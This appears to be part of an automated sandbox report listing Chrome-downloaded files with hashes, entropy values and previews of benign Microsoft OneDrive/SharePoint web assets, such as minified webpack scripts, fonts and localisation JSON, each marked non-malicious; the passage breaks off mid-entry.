                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[27],{5427:function(e,t,n){n.d(t,{a:function(){return f}});var a=n(40),i=n("tslib_538"),r=n("react-lib"),o=n(29),s=n(49),c=n(1048),d=(0,o.a)(),l=function(e){function t(){return null!==e&&e.apply(this,arguments)||this}return(0,i.e2)(t,e),t.prototype.render=function(){var e=this.props,t=e.message,n=e.styles,a=e.as,o=void 0===a?"div":a,l=e.className,u=d(n,{className:l});return r.createElement(o,(0,i.q5)({role:"status",className:u.root},(0,s.h)(this.props,s.f,["className"])),r.createElement(c.a,null,r.createElement("div",{className:u.screenReaderText},t)))},t.defaultProps={"aria-live":"polite"},t}(r.Component),u=n(48),f=(0,a.a)(l,function(e){return{root:e.className,screenReaderText:u.g}},void 0,{scope:"Announced"})}.,9417:function(e,t,n){n.d(t,{b:function(){return F},a:function(){return H}});var a={};n.r(a),n.d(a,{inputDisabled:function(){return E},inputFocused:function(){return w},picker:function(){return C},pick
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                            Category:downloaded
                                                            Size (bytes):61
                                                            Entropy (8bit):3.990210155325004
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                            SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                            SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                            SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1
                                                            Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (14046)
                                                            Category:dropped
                                                            Size (bytes):53473
                                                            Entropy (8bit):5.219958832940818
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:8B3B2F086B3AFA85C8D3F5833009D9C8
                                                            SHA1:450F0FC93833C1802E333AC73F958C5D64016AC4
                                                            SHA-256:3D7D1292EB1CF1CE2E3B70CC1645D467426CCD550DAC5B1BED9BC8A118F927AC
                                                            SHA-512:56453E2B0C22B8309B69D6CDD7B53F83C9B231ACDDC8E32E635C55F681C1D273435D6811029340E265BFC34E909392DCF975B1C2C5414FC954B67E4CF82927FE
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[129,13,167],{2585:function(e,t,n){n.d(t,{a:function(){return l}});var a=n("react-lib"),i=n("fui.core_220"),r=n(162),o=n(143),s=n(142);const c=(0,i.ir4)("r1h3qql9",null,{r:[".r1h3qql9{overflow:unset;gap:8px;display:grid;max-height:calc(100vh - 2 * 24px);box-sizing:border-box;grid-template-rows:auto 1fr;grid-template-columns:1fr 1fr auto;}"],s:["@media screen and (max-width: 480px){.r1h3qql9{max-width:100vw;grid-template-rows:auto 1fr auto;}}","@media screen and (max-height: 359px){.r1h3qql9{max-height:unset;}}"]});var d=n(242);const l=a.forwardRef((e,t)=>{const n=((e,t)=>{var n;return{components:{root:"div"},root:i.aq1((0,r.a)(null!==(n=e.as)&&void 0!==n?n:"div",{ref:t,...e}),{elementType:"div"})}})(e,t);return(e=>{const t=c();e.root.className=(0,i.daq)("fui-DialogBody",t,e.root.className)})(n),(0,d.c)("useDialogBodyStyles_unstable")(n),(e=>((0,s.a)(e),(0,o.b)(e.root,{})))(n)});l.displayName="DialogBody"}.,258
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:JSON data
                                                            Category:dropped
                                                            Size (bytes):87
                                                            Entropy (8bit):4.674522374636856
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:1629709B420FE5981924392917611397
                                                            SHA1:9925539FA01891AF3845AD86A3B0CA311A19AE4D
                                                            SHA-256:63386A3F971A5A0189426BC682D9954C68BEBAEA78124543541F81F70A05BDDC
                                                            SHA-512:7DA4ED173A42984C75B2A211CF4424AD3DA22E46281CDE7EFF1935DF5B1EE58EF3C3EF27F20DD61701394E74F2DAF19CA7A992A81201163A8E8C91E02528C014
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:{"errors":[{"message":"A query is required.","extensions":{"code":"EXECUTION_ERROR"}}]}
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:Web Open Font Format, TrueType, length 27652, version 1.3277
                                                            Category:downloaded
                                                            Size (bytes):27652
                                                            Entropy (8bit):7.989747109991782
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:31CE262A30B8D44A146E30717FB0C67E
                                                            SHA1:5A6458A761E4EE97C2B7F194C0B9ADD0E3508966
                                                            SHA-256:96DC0716D9764B406324D24A42E2636EA3C992F8013061FBC9F51B9C8A78BA28
                                                            SHA-512:E70178DAB249AC2A1DCFEC36C63D21EE15E66752DE5D31B492622DC4E710A115A8951A2803505F3EFE9874D9FA751BB2CDE571BF246271FAC641B9EF4124B516
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-08c82b19/fluenthybridfont/odsp-next-icons-8165b040.woff
                                                            Preview:wOFF......l........,........................OS/2.......G...`+Cw.cmap...P........Af?.gasp................glyf......`x...D....head..e....5...6#.hhea..e........$....hmtx..e.........5E#.loca..f........./..Hmaxp..h4....... ...'name..hL.......O..R.post..k........ ....x.c`a..8...........L..t.!.I.(......@9......VP`px..c....!...X <....N....x...ol.u...k..Z...k....U...l.........b.C3.H..*......Nq#.......cT.c.....fd...D.....w.^{....g..Q.....<O.}.$..a.&..9...L.L3...rv3.!.)K.@xSxF.&6....yqH...He$2.j..,`....'.........P....<.k....j.......?...&..a.~..A..q....R..ki..'.I....... =G?.....HG.....i.*4A....Y.$../=(.K.J.J..vJ..._./]....2.....y.|P.c.|#......6E.....sJ..|.|.L(..QI.F...RO.g.Qu\.6..^....MjE.Fm.....h~m.vP{]k..N.K..x~../.....g...=.M.%|...c.HB......[..z.>.....N.M.N~..8s)U.Z...N]O...tq........Gf..~>7.0..y|Q...p..q.E.a(..)_.yyA..)......x.2-..)Y......e../..e.oY.p^..?.....S...<F.7.aw.{....p=J.d..".x...U..d.f.....v.. .gf;...I......j.G.d.Y...n...3N...V....
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (1606)
                                                            Category:downloaded
                                                            Size (bytes):2660
                                                            Entropy (8bit):5.120785906528071
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:2F8B46542DF24C9EDC3E598F2A84A07D
                                                            SHA1:AA01E797CEED64D104284163CEF2BFBA824A0E87
                                                            SHA-256:143D18F1D2085F8C22CCA0E6270D0425A35B40B5BF4CE41D3AC9145683FBB1A5
                                                            SHA-512:EF8A942D38C36FC305D4BE75A11C5F07DE3921AE03832420813C67125F82E6EB045E00958AD796ED23B7C75C29B5C897BC1C9405005FE738E36B106616048866
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://res-1.cdn.office.net/files/odsp-web-prod_2025-01-03.002/odblightspeedwebpack/385.js
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[385],{2207:function(e,t,n){n.r(t),n.d(t,{ReactBridge:function(){return h},asPreact:function(){return b}});var a=n("react-lib"),i=n(12),r=n(14),o=n(557),s=n(290),c=n(2026),d=n(2028),l="AsReactChildren";function u(e){var t=e.portalHostManager,n=a.useRef(null),r=(0,c.a)(),o=r[0],s=r[1];return a.useEffect(function(){return function(){t.unmount(l)}},[]),a.useEffect(function(){n.current&&t.render((0,i.h)(d.a.Provider,{value:o,key:l,children:e.children}),n.current)},[e.children]),a.createElement(a.Fragment,null,a.createElement("div",{ref:n,"data-automationid":l,dangerouslySetInnerHTML:{__html:""}}),s)}var f=n(2027),p=n("fui.util_261"),m=0,_=(0,p.NN)(function(e){return"".concat(++m)});function h(e){var t=e.componentType,n=e.componentProps,c=e.className,l=(0,r.b)(d.a),p=l.render,m=l.unmount,h=(0,r.i)(null),b=(0,o.a)(function(){return n},n),g=(0,s.c)(),v=g[0],y=g[1],S=(0,r.g)(function(){return{render:function(e,t){var
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (12336)
                                                            Category:dropped
                                                            Size (bytes):14387
                                                            Entropy (8bit):5.270030932176958
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:70BBA3AFAA567183702CA283A7A7B83F
                                                            SHA1:F9734BED2848EE11946C523C8BF5C74147B61604
                                                            SHA-256:9891D6227CE660CA839A429BA44618134E5DF75D80F4DC1F3BE4F7B01AC64024
                                                            SHA-512:6C84EAA23242204E143CB78933B0FB81AD8D0A3334933BBA42360DEEAF3C1AE244BB69D935240A7C43756B578EEBB589B4DC7BCAF268E3751EA13BDA5A206A03
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[175],{5245:function(e,t,n){n.d(t,{a:function(){return a}});var a={public:"Public",private:"Private"};t.b=a}.,3285:function(e,t,n){n.r(t),n.d(t,{createSearchRoot:function(){return o},getItemStatistics:function(){return s},getProperties:function(){return r},getUserFromOwsString:function(){return c}});var a=n(2573),i=n(603);function r(e){for(var t={},n=0,a=e.results;n<a.length;n++){var i=a[n],r=i.Key,o=i.Value;switch(i.ValueType){case"Edm.Boolean":t[r]={false:!1,true:!0}[o];break;case"Edm.Double":t[r]=parseFloat(o);break;case"Edm.Byte":case"Edm.Int32":case"Edm.Int64":t[r]=parseInt(o,10);break;case"Null":t[r]=null;break;case"Edm.String":if("Edges"===r){for(var s=JSON.parse(o),c=0,d=s;c<d.length;c++){var l=d[c];l.Properties.BlobContent&&(l.Properties.BlobContent=JSON.parse(l.Properties.BlobContent.toString()))}t[r]=s}else t[r]=o;break;default:t[r]=o}}return t}function o(e){var t=new a.a(e.key);return t.type=i.a.Fo
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (12213)
                                                            Category:downloaded
                                                            Size (bytes):22157
                                                            Entropy (8bit):5.2184731939341
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:80C7694D5544D081B9D4F21D98831C3A
                                                            SHA1:FFE60193CFC7B9155A40DA2982291CBFA5591FF1
                                                            SHA-256:04FC91938049C9DBF74D9C550BAA44ED14A3E483D41006723FB515774D05FAE5
                                                            SHA-512:72D8375A34C244548AE5B265F5A18E1F2E0F40B591E753F8938EC58AD1A1776C5DB8B92D731768196EE77C3CAD7B04F35C6CA5E2EC0B795A6BFDBCD2EBDF2C7B
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://res-1.cdn.office.net/files/odsp-web-prod_2025-01-03.002/odblightspeedwebpack/12.js
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[12],{9096:function(e,t,n){n.d(t,{a:function(){return l}});var a=n(40),i=n(48),r={root:"ms-groupFooter"},o=n("react-lib"),s=n(29),c=n(1155),d=(0,s.a)(),l=(0,a.a)(function(e){var t=e.group,n=e.groupLevel,a=e.footerText,i=e.indentWidth,r=e.styles,s=e.theme,l=d(r,{theme:s});return t&&a?o.createElement("div",{className:l.root},o.createElement(c.a,{indentWidth:i,count:n}),a):null},function(e){var t=e.theme,n=e.className,a=(0,i.e)(r,t);return{root:[t.fonts.medium,a.root,{position:"relative",padding:"5px 38px"},n]}},void 0,{scope:"GroupFooter"})}.,9094:function(e,t,n){n.d(t,{a:function(){return x}});var a=n(40),i=n(48),r=n("fui.core_220"),o=n("fui.util_261"),s=n(400),c=n(2143),d=n(1155),l={root:"ms-GroupHeader",compact:"ms-GroupHeader--compact",check:"ms-GroupHeader-check",dropIcon:"ms-GroupHeader-dropIcon",expand:"ms-GroupHeader-expand",isCollapsed:"is-collapsed",title:"ms-GroupHeader-title",isSelected:"is-selected"
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:JSON data
                                                            Category:dropped
                                                            Size (bytes):18047
                                                            Entropy (8bit):4.933707654124589
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:FD2CF5F6CCD92D5E6AAEAE9F60DDE3AC
                                                            SHA1:6AEBDCB4856DD2EA7CBDE9FBC266177BE49F7C23
                                                            SHA-256:E63E5F1CEF81B136EF1CC1C4A6C6F29F93DAFE1B9638D7D1FE5B5C87C559CC25
                                                            SHA-512:F625587572E45BB8710C56FA3688E81EB51DC1E0AF9CDD13E087DEB10D6B322A07E0A6FE3BC62DB1511AE7EE4C9699DFE3BD8CC52E4D1836317AFC0AF1B64DA5
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:{. "Microsoft": "Microsoft",. "FlexpaneCloseButton": "Close pane",. "Me_Header": "My account",. "MePhotoAriaLabel": "{0} {1} Current account's user photo",. "ChangePhotoAriaLabel": "{0} {1} Change the photo that appears in IM. This may open a new window.",. "MePhotoTitle": "Current account's user photo",. "ChangePhotoTitle": "Change the photo that appears in IM. This may open a new window.",. "AppLauncherAriaLabel": "App launcher opened",. "AppLauncherCloseAriaLabel": "Close the app launcher",. "AppLauncherHomeAriaLabel": "Microsoft 365, will be open in new tab",. "AppLauncherHomeAriaLabelM365Copilot": "Microsoft 365 Copilot, will be open in new tab",. "AppsModuleHeading": "Apps",. "Microsoft365": "Microsoft 365",. "Microsoft365Copilot": "Microsoft 365 Copilot",. "AppsModuleAllApps": "All apps",. "AppsModuleAllAppsTooltip": "Open all apps",. "AllViewGroupShowMore": "Show More",. "AllViewGroupShowLess": "Show Less",. "AllViewBack": "Back",. "AllViewNewGroupHeading":
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (4270)
                                                            Category:downloaded
                                                            Size (bytes):4275
                                                            Entropy (8bit):5.329780960579515
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:5760CF0BA2C56E55E949CBC8E0B7B9CE
                                                            SHA1:2EA754E2DC2BE7F9A21F16F0A0D1F9E48DE5FA46
                                                            SHA-256:5B4003CD2292A75D3B4041E0DE54A628F0C6C2E5A762B63E469597252B10E8CF
                                                            SHA-512:90C97F0E8DCB8DF3EB423826F774A4FE68FE5B6198FFA78BEECC348B1ADCAAE865758C042DEE411CDA6ABF7E27F821B4749C165E80F4862DBF5D50985512E551
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://res-1.cdn.office.net/files/odsp-web-prod_2025-01-03.002/odblightspeedwebpack/1495.js
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[1495],{7555:function(e,t,n){n.r(t),n.d(t,{moveToNextCellInRow:function(){return f},onCellMouseDown:function(){return l},onCellMouseDrag:function(){return u},onMovementKeyDown:function(){return d}});var a=n(9824),i=n(298),r=n(299),o=n(92),s=n(587),c=n(83);function d(e,t){t.preventDefault(),t.shiftKey&&"Tab"!==t.key?function(e,t){var n=e.rootRef,i=e.focusedItemKey,r=e.focusedColumnKey,s=e.selection,c=e.selectCellRange;if(i&&r&&"cellRange"===s.type){var d=s,l=void 0,u=void 0,f=void 0,m=void 0;if(a.b.has(t.key)){var _="ArrowDown"===t.key?"next":"prev";i===d.beginRowKey?f=(0,o.fb)(n.current,d.endRowKey,_):l=(0,o.fb)(n.current,d.beginRowKey,_)}else if(a.a.has(t.key)){var h=void 0;switch(t.key){case"ArrowLeft":h=-1;break;case"ArrowRight":h=1;break;case"Home":h=a.c;break;case"End":h=a.d;break;default:h=0}r===d.beginColKey?m=p(e,d.endColKey,h,!1):u=p(e,d.beginColKey,h,!1)}c({beginRowKey:null!=l?l:d.beginRowKey,beginCo
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (9340)
                                                            Category:downloaded
                                                            Size (bytes):10497
                                                            Entropy (8bit):5.349957201079598
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:BF0B753F6B349B55E5B101F23493821B
                                                            SHA1:6DF55360EAD651C7E0453551E201FFDCB625FA7E
                                                            SHA-256:B88C0BFDFE2EE5DDD7A60060A3465DE940CB441165CB60B1FDFAED21D8C3893E
                                                            SHA-512:E51DA81339E6CAD63AA5CA39A20F619B1AA9E7B5DB9EB776D84EF42612B656A1A3901DB6EFF6418D9C182688F7E0B549BE453E707C83D28BD40BC1C8872958BF
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://res-1.cdn.office.net/files/odsp-web-prod_2025-01-03.002/odblightspeedwebpack/98.js
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[98],{6621:function(e,t,n){function a(e){return"ec63b09b-9748-47ba-9018-beeadd405204"===e}n.d(t,{a:function(){return a}})}.,5247:function(e,t,n){n.d(t,{a:function(){return I}});var a=n("tslib_538"),i=n(10),r=n(402),o=n(151),s=n(120),c=n(17),d=n(79),l=n("odsp.util_517"),u=n(108),f=n(413),p=n(1422),m=n(1423),_=n(1340),h=n(1427),b=n(27),g=l.x9.isActivated("60B05ED0-5912-442F-97BA-70A6BCAF2ADD"),v=l.x9.isActivated("5252DF6C-E868-444D-9381-8A37A145DBA8"),y=l.x9.isActivated("7B6FC2DB-D98E-4399-8BBA-E13E98CA50C4"),S=l.x9.isActivated("3C8E0286-34CC-4230-BD6A-3C099477E2F2"),D="Not implemented",I=function(){function e(e,t){var n=this;this._campaignDefinitions=[],this._shouldInitFloodgate=function(){return(0,a.yv)(n,void 0,void 0,function(){var e;return(0,a.SO)(this,function(t){switch(t.label){case 0:return g?[2,!0]:(e=this,[4,this._getFloodgateProperties()]);case 1:return e._floodgateProperties=t.sent(),[2,this._floodga
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (52482)
                                                            Category:downloaded
                                                            Size (bytes):380179
                                                            Entropy (8bit):5.382562845962266
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:C5ED66CA654E0B2BF8EF98EAA346C120
                                                            SHA1:28BAA1EA16A5D8498487B5C37077BF806C08FB88
                                                            SHA-256:24CF110C6ECB54D7BB10D8410D2ADE5C9E5F661DC62607872E9ABA3F0FF8F645
                                                            SHA-512:42A772896C2F5BB965C6BD632929646E1F38B3DCAE6CBBA67A74EAF59ACFB9B9ADD0BC13BC9B84F7829A0E5B880A489727125C02353C33B3BCE9EC69185A7257
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://res-1.cdn.office.net/files/odsp-web-prod_2025-01-03.002/odspwebworkers/en-us/spartanlistpostpltworker.js
                                                            Preview:/*! For license information please see spartanlistpostpltworker.js.LICENSE.txt */.!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define([],t):"object"==typeof exports?exports.__webpack_result__=t():e.__webpack_result__=t()}(self,()=>(()=>{var e=[(e,t)=>{var n,a,i,r,o;(n||(n={})).version="2.9.0",function(e){!function(e){e[e.BT_STOP=0]="BT_STOP",e[e.BT_STOP_BASE=1]="BT_STOP_BASE",e[e.BT_BOOL=2]="BT_BOOL",e[e.BT_UINT8=3]="BT_UINT8",e[e.BT_UINT16=4]="BT_UINT16",e[e.BT_UINT32=5]="BT_UINT32",e[e.BT_UINT64=6]="BT_UINT64",e[e.BT_FLOAT=7]="BT_FLOAT",e[e.BT_DOUBLE=8]="BT_DOUBLE",e[e.BT_STRING=9]="BT_STRING",e[e.BT_STRUCT=10]="BT_STRUCT",e[e.BT_LIST=11]="BT_LIST",e[e.BT_SET=12]="BT_SET",e[e.BT_MAP=13]="BT_MAP",e[e.BT_INT8=14]="BT_INT8",e[e.BT_INT16=15]="BT_INT16",e[e.BT_INT32=16]="BT_INT32",e[e.BT_INT64=17]="BT_INT64",e[e.BT_WSTRING=18]="BT_WSTRING",e[e.BT_UNAVAILABLE=127]="BT_UNAVAILABLE"}(e.BondDataType||(e.BondDataType=
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (55753)
                                                            Category:downloaded
                                                            Size (bytes):55783
                                                            Entropy (8bit):5.419724026767772
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:1F500DB9340D2C47A6703B6657F9EBD3
                                                            SHA1:17114F951D7D7A9D3B414B216D7E5D062A93FBF4
                                                            SHA-256:4D03D99F16E68C83BB4C902A4C02934F39A4800A7F161C4301D83FAFA52BC43E
                                                            SHA-512:72A80C9B0E07C2D0BEB200F84F90230A2D2C7DC262FC84C7AB2376DAA1135C72E8FE9C8430DACA51353ED57AD14746991ABB97432F3E196745818AC13D079F43
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://res-1.cdn.office.net/files/sp-client/odsp.fluentui.utilities/fui.util-8fd8d875.js
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["fui.util"],{"fui.util_261":(e,t,n)=>{n.d(t,{um:()=>pa,K7:()=>g,lJ:()=>Mn,cd:()=>en,ft:()=>z,q2:()=>kn,xi:()=>$t,ws:()=>B,gt:()=>Qe,p6:()=>R,DA:()=>at,vv:()=>H,ah:()=>Ln,FL:()=>Zt,Il:()=>Gt,vh:()=>fa,fG:()=>ra,HO:()=>Na,U8:()=>ye,Kw:()=>Se,Uz:()=>j,RZ:()=>u,oB:()=>Ut,mx:()=>Tt,jr:()=>De,vF:()=>J,eE:()=>yn,Zl:()=>yn,_r:()=>ve,LC:()=>ge,i2:()=>ea,DV:()=>na,qv:()=>ta,rE:()=>V,Kz:()=>X,v2:()=>te,Wb:()=>st,ig:()=>Kt,K$:()=>Me,In:()=>sa,PX:()=>s,pz:()=>M,_m:()=>w,A1:()=>E,tk:()=>Ne,NN:()=>Ya,es:()=>it,UR:()=>zt,zf:()=>Ra,RN:()=>wn,Di:()=>Jn,AQ:()=>Nt,P9:()=>T,IZ:()=>Ma,NL:()=>ga,Vb:()=>va,jN:()=>_t,su:()=>ca,Rp:()=>ba,JZ:()=>A,TP:()=>Ua,s6:()=>xa,CN:()=>Te,k0:()=>Wt,IL:()=>Gn,cl:()=>sn,M8:()=>Rt,zg:()=>jn,D7:()=>Be,v:()=>Ha,F6:()=>ia,mQ:()=>Wn,c6:()=>ya,i4:()=>Da,jU:()=>Fa,Wn:()=>Pt,Bs:()=>xt,hA:()=>je,I2:()=>ze,pp:()=>Sn,bS:()=>We,yN:()=>Sa,SH:()=>Ia,eV:()=>Oa,hV:()=>ha,p:()=>Ca,jB:()=>Bt,vA:()=>q,n0:()=>tt,P4:()=
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):306
                                                            Entropy (8bit):5.01541617898592
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:44B1A0A32BF71668B884617BDA5B922A
                                                            SHA1:F0DDAD2C257B5F6A4824A66BDAA2366BE9F2A866
                                                            SHA-256:67996D71B32704BD5BEE92AC5E3851A618EBC2C4C1260753AEAE6AFF295E1839
                                                            SHA-512:467945556340610EB135C9DA328A0A1DE9884A2117D9F223406F85C85F3E174A80D89FC676523F77C2CB49F5230E8A64532A0FB7A88500EECC3E76D90449BE7F
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:....var serviceWorkerUrl = "https:\u002f\u002fres-1.cdn.office.net\u002ffiles\u002fodsp-web-prod_2025-01-03.002\u002fodspwebworkers\u002fen-us\u002fspartanlistpostpltworker.js";....if (serviceWorkerUrl) {.....importScripts(serviceWorkerUrl);....} else {.....console.log("Invalid serviceWorkerUrl");....}...
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (9994)
                                                            Category:downloaded
                                                            Size (bytes):23672
                                                            Entropy (8bit):5.438849866807659
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:C590E1F72F4ED8BB9C980FA16FC430F5
                                                            SHA1:D4B235D7818AEB991651F5D078EE882FD2A4EE9B
                                                            SHA-256:9171D72BCEDFCD2F2929A8EC7DB5343207CDEA3DC5643BFB26C0FEEC3C499E11
                                                            SHA-512:C96F261D5F956940AB88A8B1A7D025184B798A7993E0AAD06496A7F816DC93BF3A03A90CC986D1721130AD28BB105FB54910A542C2838C5227B6043AED90A24C
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://res-1.cdn.office.net/files/odsp-web-prod_2025-01-03.002/odblightspeedwebpack/402.js
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[402],{3048:function(e,t,n){var a=n(21),i=n(125),r=function(){function e(e){this.concurrency=e||1,this._running=0,this._queue=[],this._promiseComplete=this._promiseComplete.bind(this)}return e.prototype.enqueue=function(e){var t;if(this._running<this.concurrency)this._running++,(t=e()).then(this._promiseComplete,this._promiseComplete);else{var n={callback:e,signal:null,canceled:!1,result:null};n.signal=new i.b(function(){n.canceled=!0,a.c.is(n.result)&&n.result.cancel()}),this._queue.push(n),t=n.signal.getPromise()}return a.c.resolve(t)},e.prototype._promiseComplete=function(){var e=this;if(this._running--,this._running<this.concurrency&&this._queue.length){for(var t=this._queue.shift();t&&t.canceled;)t=this._queue.length?this._queue.shift():null;t&&(this._running++,t.result=t.callback(),t.result.then(function(n){t.signal.complete(n),e._promiseComplete()},function(n){t.signal.error(n),e._promiseComplete()}))}}
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (11756)
                                                            Category:downloaded
                                                            Size (bytes):24339
                                                            Entropy (8bit):5.163684710996598
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:A4F44632DFFC5716CE850F666040167C
                                                            SHA1:C5B1AC68E97612C9220F36AC7086D89987748CFD
                                                            SHA-256:EFD82EFBB568F5689BFAA49EE83E10B4BCCB31989DC3AA9493DFE1B2839C3326
                                                            SHA-512:46A3158B2E5E37D8B984F0C9FF81A157E04521E0759155FA950F6B07FB56EC736C5CE22C8A11A51CF093FD8D425CDFD03801076C993D5848DD30BA1FAABD8169
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://res-1.cdn.office.net/files/odsp-web-prod_2025-01-03.002/odblightspeedwebpack/497.js
                                                            Preview:(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[497],{4243:function(e,t,n){"use strict";Object.defineProperty(t,"__esModule",{value:!0});var a=n(3420);t.DEFAULT_TIME_GROW_FACTOR=2.718281828459045,t.DEFAULT_TIME_JITTER=.11962656472;var i=function(){function e(e,n,i,r){void 0===i&&(i=t.DEFAULT_TIME_GROW_FACTOR),void 0===r&&(r=t.DEFAULT_TIME_JITTER),this._initialTime=e,this._maxTime=n,this._growFactor=i,this._jitterFactor=r,a.assert(this._initialTime>0,"Initial delay must be positive"),a.assert(this._maxTime>0,"Delay upper bound must be positive"),a.assert(this._growFactor>=0,"Ratio must be non-negative"),a.assert(this._jitterFactor>=0,"Jitter factor must be non-negative"),this.reset()}return e.prototype.reset=function(){this._incrementCount=0,this._currentTime=Math.round(this._initialTime*(1+Math.random()*this._jitterFactor))},e.prototype.getTime=function(){return this._currentTime},e.prototype.getIncrementCount=function(){return this._incrementCount},e.prototype.calcula
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (626)
                                                            Category:dropped
                                                            Size (bytes):823
                                                            Entropy (8bit):5.281030815196688
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:BFED24C1750B6BDA5AEC9A539E7188B4
                                                            SHA1:A776F5C1D81CFFF942830773350994DCE951528C
                                                            SHA-256:2C13F1877A0861305401A17D1B5D36241B6DAECEDB7DECE81982DF6CA80FEF3D
                                                            SHA-512:171DD70A857698EF941DF6DA22624CC4FC9922F53BB43C3F7A73A39CC339C4AEA88CA229FD23252CA7AA82D386E0917F025DE35F308DB6567E776064C02A0EE7
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[1398],{7553:function(e,t,n){n.r(t),n.d(t,{updateDragHandle:function(){return r}});var a=n(4934),i=n(92);function r(e,t,n,r,o,s){var c=t.rowEnd,d=t.colStart,l=t.colEnd;e.style.gridRowEnd="calc( ".concat(c," + var(").concat(i.v,") )"),e.style.gridColumnStart=String(d),e.style.gridColumnEnd=String(l),e.style.alignSelf="end",e.style.justifySelf=n?"end":"start",e.style.display=r?"none":"unset";var u=o+1;(n?l<=u:d<=u)?(e.classList.toggle(a.a,!0),e.style.left=1===d?"0px":"".concat(s||e.offsetLeft,"px")):(e.classList.toggle(a.a,!1),e.style.left="")}}.,4934:function(e,t,n){n.d(t,{a:function(){return a}}),(0,n("fui.util_261").ZW)([{rawString:".dragHandleOnSticky_1fd9662e{position:sticky;z-index:23}"}]);const a="dragHandleOnSticky_1fd9662e"}.}]);
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (911)
                                                            Category:downloaded
                                                            Size (bytes):2113
                                                            Entropy (8bit):5.373183787271524
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:0182236E8BE922DE9337D3BB646AA8B7
